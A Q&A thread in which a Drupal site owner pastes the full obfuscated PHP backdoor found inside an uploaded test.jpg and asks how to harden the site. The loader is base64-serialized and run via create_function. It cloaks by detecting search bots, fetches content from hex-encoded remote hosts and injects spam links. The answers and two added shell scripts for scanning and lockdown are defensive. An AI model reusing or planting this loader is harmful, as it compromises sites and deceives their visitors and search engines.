PHP code in image file



  • My Drupal website was hacked recently. While cleaning up the malicious scripts, I found that the hacker had uploaded an image file (sites/default/files/test.jpg) containing the code below.

    error_reporting(0);
    require_once('includes/session.inc');
    $serialized = 'a:36:{i:0;s:320:"aWYoIWNsYXNzX2V4aXN0cygnUmF0ZWwnKSl7aWYoZnVuY3Rpb25fZXhpc3RzKCdpc191c2VyX2xvZ2dlZF9pbicpKXtpZihpc191c2VyX2xvZ2dlZF9pbigpKXtyZXR1cm4gZmFsc2U7fX1pZihpc3NldCgkX1JFUVVFU1RbJ3hmdGVzdCddKSl7ZGllKHBpKCkqNik7fUBpbmlfc2V0KCdkaXNwbGF5X2Vycm9ycycsMCk7QGluaV9zZXQoJ2Vycm9yX3JlcG9ydGluZycsMCk7QGluaV9zZXQoJ2xvZ19lcnJvcnMnLE5VTEwpOw==";i:1;s:184:"QGluaV9zZXQoJ2RlZmF1bHRfc29ja2V0X3RpbWVvdXQnLDQpO2lmKCFpc3NldCgkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pfHwhdHJpbSgkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pKXtyZXR1cm4gZmFsc2U7fSRpc19ib3Q9MDs=";i:2;s:172:"aWYoQHByZWdfbWF0Y2goIi8oZ29vZ2xlYm90fG1zbmJvdHx5YWhvb3xzZWFyY2h8YmluZ3xhc2t8aW5kZXhlcnxjdWlsbC5jb218Y2x1c2hib3QpL2kiLCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSkpeyRpc19ib3Q9MTt9";i:3;s:384:"JHJ1cmk9dHJpbSgkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSwiXHRcblxyXDBceDBCLyIpOyRiYWRfdXJscz0nI3htbHJwYy5waHB8d3AtaW5jbHVkZXN8d3AtY29udGVudHx3cC1sb2dpbi5waHB8d3AtY3Jvbi5waHB8XD9mZWVkPXx3cC1qc29ufFwvZmVlZHxcLmNzc3xcLmpzfFwuaWNvfFwucG5nfFwuZ2lmfFwuYm1wfFwudGlmZnxcLm1wZ3xcLndtdnxcLm1wM3xcLm1wZWd8XC56aXB8XC5nemlwfFwucmFyfFwuZXhlfFwucGRmfFwuZG9jfFwuc3dmfFwudHh0fHdwLWFkbWlufGFkbWluaXN0cmF0b3IjaSc7";i:4;s:264:"aWYocHJlZ19tYXRjaCgkYmFkX3VybHMsJHJ1cmkpKXtyZXR1cm4gZmFsc2U7fSRob3N0PSd1bmtub3duJztpZihpc3NldCgkX1NFUlZFUlsiSFRUUF9IT1NUIl0pKXtpZihpc3NldCgkX1NFUlZFUlsiSFRUUF9YX0ZPUldBUkRFRF9IT1NUIl0pKXskX1NFUlZFUlsiSFRUUF9IT1NUIl09JF9TRVJWRVJbIkhUVFBfWF9GT1JXQVJERURfSE9TVCJdO30=";i:5;s:188:"JHRtcD1wYXJzZV91cmwoJ2h0dHA6Ly8nIC4kX1NFUlZFUlsiSFRUUF9IT1NUIl0pO2lmKCR0bXBbJ2hvc3QnXSl7JGhvc3Q9JHRtcFsnaG9zdCddO2lmKHN1YnN0cigkaG9zdCwwLDQpPT0gJ3d3dy4nKXskaG9zdD1zdWJzdHIoJGhvc3QsNCk7fX0=";i:6;s:144:"aWYoaXNzZXQoJF9SRVFVRVNUW21kNShtZDUoJGhvc3QpKV0pT1IgaXNzZXQoJF9DT09LSUVbbWQ1KG1kNSgkaG9zdCkpXSkpe2RpZSgnc3VzcGljaW91cyByZXF1ZXN0IGRlbmllZCcpO319";i:7;s:248:"Y2xhc3MgUmF0ZWx7cHVibGljICRsaW5rc191cmw9Ilx4NjhceDc0XHg3NFx4NzBceDNhXHgyZlx4MmZceDc5XHg2NVx4NmRceDY1XHg2Ylx4NzRceDYxXHg3Mlx4NjlceDY2XHg2OVx4MzJceDM0XHgyZVx4NjNceDZmXHg2ZFx4MmZceDZmXHg2ZVx4NjVceDY3XHg3NFx4MmZceDY3XHg2N
Vx4NzRceDJlXHg3MFx4NjhceDcwIjs=";i:8;s:232:"cHVibGljICRkb29yX3VybD0iXHg2OFx4NzRceDc0XHg3MFx4M2FceDJmXHgyZlx4NjJceDZjXHg2Zlx4NjNceDZiXHg2MVx4NjRceDczXHgyZVx4NmRceDY1XHg2ZVx4MmYiO3B1YmxpYyAkaXA9Jyc7cHVibGljICR1YT0nJztwdWJsaWMgJGNzcz0nJztwdWJsaWMgJGpzPScnO3B1YmxpYyAkaG9zdD0nJzs=";i:9;s:216:"cHVibGljICRpcF9saXN0cz1hcnJheSgnZ29vZ2xlJz0+YXJyYXkoJzIwMy4yMDguNjAuMC8yNCcsJzY2LjI0OS42NC4wLzIwJywnNzIuMTQuMTk5LjAvMjQnLCcyMDkuODUuMjM4LjAvMjQnLCc2Ni4yNDkuOTAuMC8yNCcsJzY2LjI0OS45MS4wLzI0JywnNjYuMjQ5LjkyLjAvMjQnKSw=";i:10;s:300:"J2JpbmcnPT5hcnJheSgnNjcuMTk1LjM3LjAvMjQnLCc2Ny4xOTUuNTAuMC8yNCcsJzY3LjE5NS4xMTAuMC8yNCcsJzY3LjE5NS4xMTEuMC8yNCcsJzY3LjE5NS4xMTIuMC8yMycsJzY3LjE5NS4xMTQuMC8yNCcsJzY3LjE5NS4xMTUuMC8yNCcsJzY4LjE4MC4yMjQuMC8yMScsJzcyLjMwLjEzMi4wLzI0JywnNzIuMzAuMTQyLjAvMjQnLCc3Mi4zMC4xNjEuMC8yNCcsJzcyLjMwLjE5Ni4wLzI0Jyw=";i:11;s:492:"JzcyLjMwLjE5OC4wLzI0JywnNzQuNi4yNTQuMC8yNCcsJzc0LjYuOC4wLzI0JywnNzQuNi4xMy4wLzI0JywnNzQuNi4xNy4wLzI0JywnNzQuNi4xOC4wLzI0JywnNzQuNi4yMi4wLzI0JywnNzQuNi4yNy4wLzI0JywnOTguMTM3LjcyLjAvMjQnLCc5OC4xMzcuMjA2LjAvMjQnLCc5OC4xMzcuMjA3LjAvMjQnLCc5OC4xMzkuMTY4LjAvMjQnLCcxMTQuMTExLjk1LjAvMjQnLCcxMjQuODMuMTU5LjAvMjQnLCcxMjQuODMuMTc5LjAvMjQnLCcxMjQuODMuMjIzLjAvMjQnLCcxODMuNzkuNjMuMC8yNCcsJzE4My43OS45Mi4wLzI0JywnMjAzLjIxNi4yNTUuMC8yNCcsJzIxMS4xNC4xMS4wLzI0JywnNjUuNTIuMTA0LjAvMjQnLCc2NS41Mi4xMDguMC8yMics";i:12;s:204:"JzY1LjU1LjI0LjAvMjQnLCc2NS41NS41Mi4wLzI0JywnNjUuNTUuNTUuMC8yNCcsJzY1LjU1LjIxMy4wLzI0JywnNjUuNTUuMjE3LjAvMjQnLCcxMzEuMjUzLjI0LjAvMjInLCcxMzEuMjUzLjQ2LjAvMjMnLCc0MC43Ny4xNjcuMC8yNCcsJzE5OS4zMC4yNy4wLzI0Jyw=";i:13;s:448:"JzE1Ny41NS4xNi4wLzIzJywnMTU3LjU1LjE4LjAvMjQnLCcxNTcuNTUuMzIuMC8yMicsJzE1Ny41NS4zNi4wLzI0JywnMTU3LjU1LjQ4LjAvMjQnLCcxNTcuNTUuMTA5LjAvMjQnLCcxNTcuNTUuMTEwLjQwLzI5JywnMTU3LjU1LjExMC40OC8yOCcsJzE1Ny41Ni45Mi4wLzI0JywnMTU3LjU2LjkzLjAvMjQnLCcxNTcuNTYuOTQuMC8yMycsJzE1Ny41Ni4yMjkuMC8yNCcsJzE5OS4zMC4xNi4wLzI0JywnMjA3LjQ2LjEyLjAvMjMnLCcyMDcuNDYuMTkyLjAvMjQnLCcyMDcuNDYuMTk1LjAvMjQnLCcyMDcuNDYuMTk5LjAvMjQnLCcyMDcuNDYuMjA0LjAvMjQnLCcxNTcuNTUuMzkuMC8yNCc
pLA==";i:14;s:504:"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";i:15;s:124:"JzIwMi40Ni40OC4wLzIwJywnMjIwLjE4MS4zOC4wLzI0JywnMTIzLjEyNS42OC44MC8zMCcsJzEyMy4xMjUuNjguODQvMzEnLCcxMjMuMTI1LjY4LjAvMjQnKSw=";i:16;s:512:"J3lhbmRleCc9PmFycmF5KCcxMDAuNDMuOTAuMC8yNCcsJzM3LjkuMTE1LjAvMjQnLCczNy4xNDAuMTY1LjAvMjQnLCc3Ny44OC4yMi4wLzI1JywnNzcuODguMjkuMC8yNCcsJzc3Ljg4LjMxLjAvMjQnLCc3Ny44OC41OS4wLzI0JywnODQuMjAxLjE0Ni4wLzI0JywnODQuMjAxLjE0OC4wLzI0JywnODQuMjAxLjE0OS4wLzI0JywnODcuMjUwLjI0My4wLzI0JywnODcuMjUwLjI1My4wLzI0JywnOTMuMTU4LjE0Ny4wLzI0JywnOTMuMTU4LjE0OC4wLzI0JywnOTMuMTU4LjE1MS4wLzI0JywnOTMuMTU4LjE1My4wLzMyJywnOTUuMTA4LjEyOC4wLzI0JywnOTUuMTA4LjEzOC4wLzI0JywnOTUuMTA4LjE1MC4wLzIzJywnOTUuMTA4LjE1OC4wLzI0JywnOTUuMTA4LjE1Ni4wLzI0Jyw=";i:17;s:220:"Jzk1LjEwOC4xODguMTI4LzI1JywnOTUuMTA4LjIzNC4wLzI0JywnOTUuMTA4LjI0OC4wLzI0JywnMTAwLjQzLjgwLjAvMjQnLCcxMzAuMTkzLjYyLjAvMjQnLCcxNDEuOC4xNTMuMC8yNCcsJzE3OC4xNTQuMTY1LjAvMjQnLCcxNzguMTU0LjE2Ni4xMjgvMjUnLCcxNzguMTU0LjE3My4yOScs";i:18;s:444:"JzE3OC4xNTQuMjAwLjE1OCcsJzE3OC4xNTQuMjAyLjAvMjQnLCcxNzguMTU0LjIwNS4wLzI0JywnMTc4LjE1NC4yMzkuMC8yNCcsJzE3OC4xNTQuMjQzLjAvMjQnLCczNy45Ljg0LjI1MycsJzE5OS4yMS45OS45OScsJzE3OC4xNTQuMTYyLjI5JywnMTc4LjE1NC4yMDMuMjUxJywnMTc4LjE1NC4yMTEuMjUwJywnOTUuMTA4LjI0Ni4yNTInLCc1LjQ1LjI1NC4wLzI0JywnNS4yNTUuMjUzLjAvMjQnLCczNy4xNDAuMTQxLjAvMjQnLCczNy4xNDAuMTg4LjAvMjQnLCcxMDAuNDMuODEuMC8yNCcsJzEwMC40My44NS4wLzI0JywnMTAwLjQzLjkxLjAvMjQnLCcxOTkuMjEuOTkuMC8yNCcpKTs=";i:19;s:540:"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";i:20;s:544:"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";i:21;s:284:"J3VhJz0+ICR0aGlzLT51YSwncmVmJz0+ICRfU0VSVkVSWyJIVFRQX1JFRkVSRVIiXSwnaXAnPT4gJHRoaXMtPmlwLCdub3RfdXJpJz0+ICRub3RfdXJpLCdsYW5nJz0+ICRfU0VSVkVSWydIVFRQX0FDQ0VQVF9MQU5HVUFHRSddLCdib3QnPT4gJHRoaXMtPmJvdCkpKSAuJyZ1cmw9JyAuJF9TRVJWRVJbIkhUVFBfSE9TVCJdOyRjb250ZW50PSR0aGlzLT5nZXQoJHVybF9wKTs=";i:22;s:316:"aWYoIWVtcHR5KCRjb250ZW50KW9yICRjb250ZW50ICE9ICcnKXskY29udGVudD1AYmFzZTY0X2RlY29kZSgkY29udGVudCk7aWYoc3RycG9zKCRjb250ZW50LCc0MD
Rfbm90X2ZvdW5kJykhPT0gZmFsc2Upe2hlYWRlcigiSFRUUC8xLjAgNDA0IE5vdCBGb3VuZCIpO2V4aXQ7fWlmKHN0cnJpcG9zKCRjb250ZW50LCcga2V5cy8nIC4kX1NFUlZFUlsiSFRUUF9IT1NUIl0pIT09IGZhbHNlKXtyZXR1cm4gZmFsc2U7fQ==";i:23;s:320:"aWYoQHN0cnBvcyhAc3RydG9sb3dlcigkY29udGVudCksJzwvaHRtbD4nKSE9PSBmYWxzZSl7ZGllKCRjb250ZW50KTt9fWVsc2V7JHRoaXMtPmxpbmtzPSR0aGlzLT5tYWtlX2xpbmtzKCk7aWYoIWVtcHR5KCR0aGlzLT5saW5rcylvciAkdGhpcy0+bGlua3MgIT09IEZhbHNlKXtvYl9zdGFydChhcnJheSgkdGhpcywncndjb250ZW50JykpO3JlZ2lzdGVyX3NodXRkb3duX2Z1bmN0aW9uKCdvYl9lbmRfZmx1c2gnKTt9fX0=";i:24;s:608:"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";i:25;s:368:"JGxpbmtzPWlzc2V0KCRtWzFdKT8kbVsxXTphcnJheSgpO3JldHVybiAkbGlua3M7fXJldHVybiBmYWxzZTt9ZnVuY3Rpb24gcndjb250ZW50KCRjb250ZW50KXskdGFncz1hcnJheSgncCcsJ3NwYW4nLCdzdHJvbmcnLCdlbScsJ2knLCd0ZCcsJ2RpdicsJ3VsJywnbGknLCdzcGFuJywnYm9keScpOyR0YWdzX3ZhbHM9YXJyYXkoKTtmb3JlYWNoKCR0YWdzIGFzICR0YWcpe3ByZWdfbWF0Y2hfYWxsKCJ+PHskdGFnfS4qPz4oLio/KTwveyR0YWd9Pn5pIiwkY29udGVudCwkbWF0Y2hlcyk7";i:26;s:212:"aWYoQGlzc2V0KCRtYXRjaGVzWzBdKSl7Zm9yZWFjaCgkbWF0Y2hlc1swXWFzICRtYXRjaCl7JHRhZ3NfdmFsc1tdPWFycmF5KCd0YWcnPT4gJHRhZywnY29udGVudCc9PiAkbWF0Y2gpO319aWYoY291bnQoJHRhZ3NfdmFscyk+Y291bnQoJHRoaXMtPmxpbmtzKSl7YnJlYWs7fX0=";i:27;s:612:"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";i:28;s:420:"ZWxzZXskdGFnX2NvbnRlbnRfbmV3PXN0cl9yZXBsYWNlKCI8L3skdGFnX3ZhbFsndGFnJ119PiIsIiB7JGxpbmt9IDwveyR0YWdfdmFsWyd0YWcnXX0+IiwkdGFnX3ZhbFsnY29udGVudCddKTt9fSRjb250ZW50PXByZWdfcmVwbGFjZSgifnskdGFnX3ZhbFsnY29udGVudCddfX5pIiwkdGFnX2NvbnRlbnRfbmV3LCRjb250ZW50LDEpO3Vuc2V0KCR0YWdzX3ZhbHNbJHRhZ19pbmRleF0pO2lmKHN0cnBvcygkY29udGVudCwkbGluaykhPT0gZmFsc2Upe3Vuc2V0KCRsaW5rc1skbGlua19pbmRleF0pO2NvbnRpbnVlIDI7fX19cmV0dXJuICRjb250ZW50O30=";i:29;s:424:"ZnVuY3Rpb24gZGV0ZWN0X2JvdCgpe2lmKEBwcmVnX21hdGNoKCcvZ29vZ2xlL2knLCR0aGlzLT51YSkpeyR0aGlzLT5ib3Q9J2dvb2dsZSc7cmV0dXJuO31pZihAcHJlZ19tYXRjaCgnL2Jpbmd8bXNufG1zcnxzbHVycHx5YWhvby9pJywkdGhpcy0+dWEpKXskdGhpcy0+Ym90PSdiaW5nJztyZXR1cm47fWlmKEBwcmVnX21hdGNoKCcveWFuZGV4fHlhZGlyZWN0Ym90L2knLCR0aG
lzLT51YSkpeyR0aGlzLT5ib3Q9J3lhbmRleCc7cmV0dXJuO31pZihAcHJlZ19tYXRjaCgnL2JhaWR1L2knLCR0aGlzLT51YSkpeyR0aGlzLT5ib3Q9J2JhaWR1JztyZXR1cm47fQ==";i:30;s:516:"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";i:31;s:576:"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";i:32;s:500:"ZnVuY3Rpb24gZ2V0KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnY3VybF9pbml0JykpeyRjaD1jdXJsX2luaXQoJHVybCk7Y3VybF9zZXRvcHQoJGNoLENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsOCk7Y3VybF9zZXRvcHQoJGNoLENVUkxPUFRfVElNRU9VVCwxNSk7Y3VybF9zZXRvcHQoJGNoLENVUkxPUFRfSEVBREVSLDApO2N1cmxfc2V0b3B0KCRjaCxDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLDEpO2N1cmxfc2V0b3B0KCRjaCxDVVJMT1BUX1VTRVJBR0VOVCwnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBXT1c2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzMzLjAuMTc1MC4xNTQgU2FmYXJpLzUzNy4zNicpOw==";i:33;s:548:"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";i:34;s:616:"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";i:35;s:152:"JHJhdGVsPW5ldyBSYXRlbDskcmF0ZWwtPmluaXQoJHJ1cmksJGhvc3QsJGlzX2JvdCk7aWYoIWVtcHR5KCRfUkVRVUVTVFsnc2V0X2xhbmcnXSkpIGVjaG8gJzwhLS0gbGFuZ19VU18yIC0tPic7fQ==";}';
    $rawData = array_map("base64_decode", unserialize($serialized));
    $rawData = implode($rawData);
    $outputData = create_function(false, $rawData);
    call_user_func($outputData);
    

    Questions:

    1. Since the file extension is .jpg, will the PHP code get executed?
    2. As I understand it, Drupal creates a .htaccess file in the sites/default/files directory containing php_flag engine off; does that mean that all PHP code in the files directory can't get executed?

    Let's say I don't want to update my Drupal application to the latest version; I was thinking whether the below makes sense:

    1. I change all directory & file permissions (except sites/default/files) to 555 or 444, meaning the hacker wouldn't be able to upload any scripts to my server? Is this considered safe?

    2. I added

      <FilesMatch "\.(php)$">Order allow,deny</FilesMatch>
      

      in sites/default/files/.htaccess; will it be more secure, or is it not necessary?
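    An added example, not code from the question or from the answer: a POSIX shell audit a site owner could run over the upload directory to find files like the test.jpg described above. The function names are hypothetical; the script assumes only sh, find, grep and od. It flags image-named files with no image signature (PHP source saved as .jpg), real images with PHP tags or loader functions appended, and source lines in the code base that include or require a variable path, since that is what would load such a file.

```shell
#!/bin/sh
# Added example, not code from the question or the answer.  Audits a
# Drupal-style upload directory for files like the test.jpg described
# above.  Function names are hypothetical; only POSIX sh, find, grep and
# od are required.

# Exit 0 if the file begins with a JPEG, PNG or GIF signature.
has_image_magic() {
    sig=$(od -An -tx1 -N4 "$1" | tr -d ' \n')
    case "$sig" in
        ffd8ff*)  return 0 ;;   # JPEG
        89504e47) return 0 ;;   # PNG
        47494638) return 0 ;;   # GIF
        *)        return 1 ;;
    esac
}

# Print "<path><TAB><reason>" for every image-named file under $1 that
# either is not an image at all (the case in the question: PHP source
# saved as .jpg) or is a real image with PHP tags or loader functions
# appended to it (a polyglot that still carries valid image magic).
# A legitimate image whose EXIF comment happens to contain "<?php" will
# also be reported, so review hits before deleting anything.
scan_uploads() {
    find "$1" -type f \( -iname '*.jpg' -o -iname '*.jpeg' \
                      -o -iname '*.png' -o -iname '*.gif' \) |
    while IFS= read -r f; do
        if ! has_image_magic "$f"; then
            printf '%s\tNOT_AN_IMAGE\n' "$f"
        elif grep -q -E '<\?php|<\?=|create_function|base64_decode|unserialize' "$f"; then
            printf '%s\tPHP_IN_IMAGE\n' "$f"
        fi
    done
}

# List source lines under $1 that include/require a variable path
# (e.g. "include $default;"), the kind of dynamic include through which
# a file the web server itself will not execute can still get run.
find_dynamic_includes() {
    find "$1" -type f \( -name '*.php' -o -name '*.inc' -o -name '*.module' \) |
    while IFS= read -r f; do
        # /dev/null as a second operand forces grep to prefix the file name
        grep -n -E '(^|[^A-Za-z0-9_])(include|require)(_once)?[[:space:]]*\(?[[:space:]]*\$' \
            "$f" /dev/null || true
    done
}

# Usage: sh audit.sh /var/www/drupal/sites/default/files /var/www/drupal
if [ $# -ge 1 ]; then
    scan_uploads "$1"
    find_dynamic_includes "${2:-.}"
fi
```

    Run it from a shell on the server with the upload directory as the first argument and the code root as the second; every reported line names a file to inspect by hand.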



    1. The code won't be executed by the web server (or FastCGI process) unless it is misconfigured, but it may be executed by other PHP files. Normally you scan PHP files for exploits, and obfuscated code looks suspicious. It's reasonable to masquerade it as a jpg file and do something like this* in another (corrupted) PHP file (which looks less suspicious):

      $default = "test.jpg";

      [...lots of valid code... ]

      include $default;

    2. It depends on the particular software and configuration. E.g. nginx won't honor .htaccess files. It is also possible to disable .htaccess evaluation in the Apache config. The original intent of the file is what you correctly identified. The exact result depends on the actual configuration. If you have control over the web server, security options should go into the server config directly instead of .htaccess anyway.

    3. Changing file permissions won't help much if they can be changed back. You have to change the owner of the files and directories while removing write permission. (The execute flag is not necessary to run a PHP script, so 444 is fine.) You need to do something like chown -R manager . for everything except the upload directory. Of course this means you need a second user (e.g. manager) for file uploads and updates, different from the user owning the Apache PHP module or FastCGI process. It's always good practice!

    4. Not really. The Order directive only affects the interpretation order of other directives. Without the respective Allow and Deny directives we don't know much.

    * If there is a dynamic include or eval in the application code, that can also be exploited.
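    An added example, not code from the answer or from Drupal, that carries out the answer's points 3 and 4: a .htaccess for the upload directory that actually denies .php (the question's snippet has Order but no Deny, so it denies nothing), and a read-only lockdown of everything outside the upload directory with a separate owner. The Apache 2.2 (Order/Deny) and 2.4 (Require) directives are standard; the function names, the manager account and the assumption that the script runs as root when ownership is to be changed are mine.

```shell
#!/bin/sh
# Added example, not code from the answer or from Drupal.
# Assumes Apache with AllowOverride permitting .htaccess in the docroot,
# a Drupal tree whose upload directory is sites/default/files, and an
# optional non-web-server account (here "manager") that owns the code.

# 1. A .htaccess for the upload directory that actually denies .php.
#    "Order allow,deny" on its own only sets precedence; without a Deny
#    line nothing is denied.  Both the 2.2 (Order/Deny) and 2.4 (Require)
#    forms are written so the file works on either version.
write_upload_htaccess() {
    cat > "$1/.htaccess" <<'EOF'
# Do not run PHP from here (mod_php only; PHP-FPM ignores php_flag)
<IfModule mod_php5.c>
  php_flag engine off
</IfModule>
<IfModule mod_php7.c>
  php_flag engine off
</IfModule>
# Do not even serve PHP-like files from here
<FilesMatch "\.(php|phtml|php[0-9]|phar)$">
  <IfModule !mod_authz_core.c>
    Order allow,deny
    Deny from all
  </IfModule>
  <IfModule mod_authz_core.c>
    Require all denied
  </IfModule>
</FilesMatch>
EOF
}

# 2. Read-only code: 555 on directories, 444 on files, for everything
#    under $1 except the upload directory given relative to it in $2.
#    Ownership is changed to $3 only when running as root and the account
#    exists; otherwise only the chmod is applied.
lock_down() {
    root="$1"; uploads="$1/$2"; owner="${3:-manager}"
    if [ "$(id -u)" -eq 0 ] && id "$owner" >/dev/null 2>&1; then
        find "$root" -path "$uploads" -prune -o -exec chown "$owner" {} +
    fi
    find "$root" -path "$uploads" -prune -o -type d -exec chmod 555 {} +
    find "$root" -path "$uploads" -prune -o -type f -exec chmod 444 {} +
}

# 3. Audit: count objects outside the upload directory that still carry
#    any write bit.  Prints 0 once lock_down has been applied.
count_writable() {
    find "$1" -path "$1/$2" -prune -o \
        \( -perm -200 -o -perm -020 -o -perm -002 \) -print | wc -l | tr -d ' '
}

# Usage: sh lockdown.sh /var/www/drupal sites/default/files [manager]
if [ $# -ge 2 ]; then
    write_upload_htaccess "$1/$2"
    lock_down "$1" "$2" "$3"
    echo "writable objects outside uploads: $(count_writable "$1" "$2")"
fi
```

    Under PHP-FPM the php_flag line has no effect; the equivalent there is to not route requests under the upload directory to the FPM handler in the vhost configuration, which is the "put it in the server config" advice of point 2. Updates then have to be done as the manager user, since the web server account can no longer write to the code.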


